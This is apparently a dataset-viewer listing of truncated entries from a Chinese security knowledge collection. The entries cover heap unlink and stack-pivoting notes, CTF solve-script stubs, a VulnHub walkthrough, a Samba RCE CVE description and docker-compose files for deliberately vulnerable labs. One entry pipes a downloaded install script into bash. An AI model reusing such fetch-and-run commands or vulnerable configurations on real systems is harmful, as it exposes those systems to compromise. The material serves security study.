unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在以下地方使用
- malloc
- 从恰好大小合适的 large bin 中获取 chunk。
- **这里需要注意的是 fastbin 与 small bin 就没有使用 unlink,这就是为什么漏洞会经常出现在它们这里的原因。**
- 依次遍历处理 unsorted bin 时也没有使用 unlink 。
- 从比请求的 chunk 所在的 bin 大的 bin 中取 chunk。
- free
- 后向合并,合并物理相邻低地址空闲 chunk。
... | sec-knowleage |
import base64
import hashlib
import re
import string
import itertools
from crypto_commons.netcat.netcat_commons import receive_until_match, nc, send, receive_until
from crypto_commons.symmetrical.symmetrical import set_byte_cbc, set_cbc_payload_for_block
def PoW(suffix, digest):
for prefix in itertools.product(... | sec-knowleage |
# HTTP
<!-- GFM-TOC -->
* [HTTP](#http)
* [一 、基础概念](#一-基础概念)
* [请求和响应报文](#请求和响应报文)
* [URL](#url)
* [二、HTTP 方法](#二http-方法)
* [GET](#get)
* [HEAD](#head)
* [POST](#post)
* [PUT](#put)
* [PATCH](#patch)
* [DELETE](#delete)
* [OPTIONS](#options... | sec-knowleage |
# RC4
## 基本介绍
RSA 由 Ron Rivest 设计,最初隶属于 RSA 安全公司,是一个专利密码产品。它是面向字节的流密码,密钥长度可变,非常简单,但也很有效果。RC4 算法广泛应用于 SSL/TLS 协议和 WEP/WPA 协议。
## 基本流程
RC4 主要包含三个流程
- 初始化 S 和 T 数组。
- 初始化置换 S。
- 生成密钥流。
### 初始化 S 和 T 数组
初始化 S 和 T 的代码如下
```c
for i = 0 to 255 do
S[i] = i
T[i] = K[i mod keylen])
```
### 初始化置换 S
```c
j = 0
for i = 0 to 255 ... | sec-knowleage |
# TRE: 1
> https://download.vulnhub.com/tre/Tre.zip
靶场IP:`192.168.2.132`
扫描对外端口服务
```
┌──(root💀kali)-[~]
└─# nmap -p1-65535 -sV 192.168.2.132 ... | sec-knowleage |
s = """
2004 ES = 03741 : EE = 04981 : EK = 148
2004 ES = 05363 : EE = 06632 : EK = 152
2004 ES = 07014 : EE = 08219 : EK = 165
2004 ES = 08601 : EE = 09868 : EK = 184
2004 ES = 10250 : EE = 11483 : EK = 199
2004 ES = 11865 : EE = 13107 : EK = 240
2004 ES = 13489 : EE = 14760 : EK = 249
2004 ES = ... | sec-knowleage |
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.29.
.TH MAKEINFO "1" "June 2003" "makeinfo 4.6" "User Commands"
.SH NAME
makeinfo \- 翻译 Texinfo 文档
.SH "SYNOPSIS 总览"
.B makeinfo
[\fIOPTION\fR]... \fITEXINFO-FILE\fR...
.SH "DESCRIPTION 描述"
将 Texinfo 源文档翻译为各种其他格式,默认是可以用 Emacs 或者独立的 GNU Info 查看的,适于在线阅读的 Info 文... | sec-knowleage |
import codecs
import re
from crypto_commons.generic import chunk
def get_sounds():
with codecs.open("killthegauls.xml", "r") as input_file:
data = input_file.read()
return re.findall("<step>(.*)</step>\s*.*\s*<octave>(.*)</octave>", data)
def main():
sounds_list = get_sounds()
print(sou... | sec-knowleage |
# Release Notes
## 21/3/2020
initial commit
## 9/6/2020
Use Travis for integration and deployment.
## 25/9/2020
Updated theme's color, changed the logo and favicon.
Chinese search is now supported.
## 8/5/2021
Add CNAME, now using `wiki.y1ng.org` as the domain of this site. | sec-knowleage |
# Samba Authenticated RCE (CVE-2017-7494, Aka SambaCry)
[中文版本(Chinese version)](README.zh-cn.md)
Samba is the standard Windows interoperability suite of programs for Linux and Unix, it provides secure, stable and fast file and print services for all clients using the SMB/CIFS protocol.
Samba 3.x after 3.5.0 and 4.x ... | sec-knowleage |
# OpenPLC 环境搭建
<p align="center">
<img src="../../../../assets/img/banner/OpenPLC.png">
</p>
---
**实验环境**
`环境仅供参考`
- [操作系统] Microsoft Windows 10 企业版 LTSC - 10.0.17763
- [魔法软件] SSTap
---
## 前言
在国内, 你要在 windows 上装 OpenPLC 最好学会挂全局代理, 无论是直接拨 VPN, 还是通过 Proxifier 走隧道, 都可以。
没挂代理之前几个 cygwin 模块,python 模块装下来老夫都快圆寂了.
---
## O... | sec-knowleage |
# Classifier9000
In this task we have access to a neural network image classifier which returns `(predictions, percentage_probabilities)` pair for each input image. We also have starting image "car.jpg" which is classified as `sports_car`. The task is to forge this image to be classified as `racer`.
... | sec-knowleage |
version: '2'
services:
samba:
image: vulhub/samba:4.6.3
tty: true
volumes:
- ./smb.conf:/usr/local/samba/etc/smb.conf
ports:
- "445:445"
- "6699:6699" | sec-knowleage |
# Times New Roman
Category: Cryptography, 100 points
## Description
> I found this code in one of the learning center in the Technion, can you figure out what it is?
>
> Note: the flag is all lowercase
```
👍💧❄☜👍☟☠✋⚐☠❀❄☟☜♉☝✌💧❄☜☼♉👍☜☠❄☜☼♉✋💧♉❄☟☜♉👌☜💧❄♉☝✌💧❄☜☼❝
```
## Solution
We know that the flag format is `cstec... | sec-knowleage |
version: '2'
services:
web:
image: vulhub/confluence:7.13.6
ports:
- "8090:8090"
depends_on:
- db
db:
image: postgres:12.8-alpine
environment:
- POSTGRES_PASSWORD=postgres
- POSTGRES_DB=confluence | sec-knowleage |
#!/usr/bin/python
# coding=utf-8
# https://raw.githubusercontent.com/cujanovic/SSRF-Testing/master/ip.py
from __future__ import print_function
from builtins import oct
from builtins import str
from builtins import hex
from builtins import range
from random import *
from io import open
import datetime
import string
impo... | sec-knowleage |
## precision (pwn, 100p, 272 solves)
### PL
[ENG](#eng-version)
> nc 54.173.98.115 1259
> [precision_a8f6f0590c177948fe06c76a1831e650](precision)
Pobieramy udostępnioną binarkę i na początek sprawdzamy jakie utrudnienia przygotowali nam autorzy.
```
# checksec.sh --file precision
RELRO STACK CANARY NX ... | sec-knowleage |
# 花式栈溢出技巧
## stack pivoting
### 原理
stack pivoting,正如它所描述的,该技巧就是劫持栈指针指向攻击者所能控制的内存处,然后再在相应的位置进行 ROP。一般来说,我们可能在以下情况需要使用 stack pivoting
- 可以控制的栈溢出的字节数较少,难以构造较长的 ROP 链
- 开启了 PIE 保护,栈地址未知,我们可以将栈劫持到已知的区域。
- 其它漏洞难以利用,我们需要进行转换,比如说将栈劫持到堆空间,从而在堆上写 rop 及进行堆漏洞利用
此外,利用 stack pivoting 有以下几个要求
- 可以控制程序执行流。
- 可以控制 sp 指针。一般来说,控制栈指针会使用 ... | sec-knowleage |
#在 Linux 上快速配置开发环境
作者本人用 ubuntu/deepin 系统,所以这里的教程都用
ubuntu/deepin 系统
### 先安装 curl
curl是利用URL语法在命令行方式下工作的开源文件传输工具
```
sudo apt-get update
sudo apt-get install curl
```
### 安装 nvm
nvm 是 node 版本管理工具,管理 nodejs 版本和 npm 版本
```
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.0/install.sh | bash
```
#### 参考
>... | sec-knowleage |
#!/usr/bin/python
import binascii
import hashlib
import os
def rotl(num, bits=64):
bit = num & (1 << (bits - 1))
num <<= 1
if (bit):
num |= 1
num &= (2 ** bits - 1)
return num
def rotr(num, bits=64):
num &= (2 ** bits - 1)
bit = num & 1
num >>= 1
if (bit):
num |= ... | sec-knowleage |
version: '2'
services:
nginx:
image: nginx:1
volumes:
- ./www/index.php:/usr/share/nginx/html/index.php
- ./nginx/default.conf:/etc/nginx/conf.d/default.conf
depends_on:
- php
ports:
- "8080:80"
php:
image: vulhub/php:httpoxy
volumes:
- ./www/index.php:/var/www/html/index.php | sec-knowleage |
## SecCoding (Misc, 100p)
> You should fix vulnerabilities of the given source code, WITHOUT changing its normal behaviour. Link
###ENG
[PL](#pl-version)
We are given following code, and are tasked with repairing bugs and vulnerabilities in it:
```cpp
#include <vector>
#include <iostream>
#include <windows.h>
using n... | sec-knowleage |
.TH SHOWKEY 1 "09 Oct 1997" "Console tools" "Linux User's Manual"
.SH NAME
showkey \- 检查来自键盘的扫描码和键盘码
.SH "总览 (SYNOPSIS)"
.BI "showkey [ -[" hVskm "] | " --help " | " --version " | " --scancodes
.BI "| " --keycodes " | " --keymap " ] [ " -t " N | " --timeout= "N ]"
.SH "描述 (DESCRIPTION)"
.PP
按下/松开 任一个 键 时,
.B showkey
在... | sec-knowleage |
# Leetcode 题解 - 二分查找
<!-- GFM-TOC -->
* [Leetcode 题解 - 二分查找](#leetcode-题解---二分查找)
* [1. 求开方](#1-求开方)
* [2. 大于给定元素的最小元素](#2-大于给定元素的最小元素)
* [3. 有序数组的 Single Element](#3-有序数组的-single-element)
* [4. 第一个错误的版本](#4-第一个错误的版本)
* [5. 旋转数组的最小数字](#5-旋转数组的最小数字)
* [6. 查找区间](#6-查找区间)
<!-- GFM-TOC -->
**正常实现** ... | sec-knowleage |
# Finding Ducky - Part 1
Category: OSINT, 50 points
## Description
> Ducky is missing! A few days ago ducky tweeted that he is on to something big..and then yesterday he tweeted a cryptic messaged, Any attemp of contacting him didn't work and we believe he might have been kidnapped. We think he might have contacted his... | sec-knowleage |
# Drow number guessing (game/crypto, 60p, 12 solved)
This challenge was part of the Arcane Sector 2 game.
We have a quest to guess the number an NPC is thinking of.
In the server code we can find the way the random number is generated:
```python
self.seed = bytearray(os.urandom(32))
def gen_number(self, player):
... | sec-knowleage |
/* This file has been generated by the Hex-Rays decompiler.
Copyright (c) 2007-2017 Hex-Rays <info@hex-rays.com>
Detected compiler: GNU C++
*/
#include <defs.h>
//-------------------------------------------------------------------------
// Function declarations
__int64 (**init_proc())(void);
void sub_4620();... | sec-knowleage |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.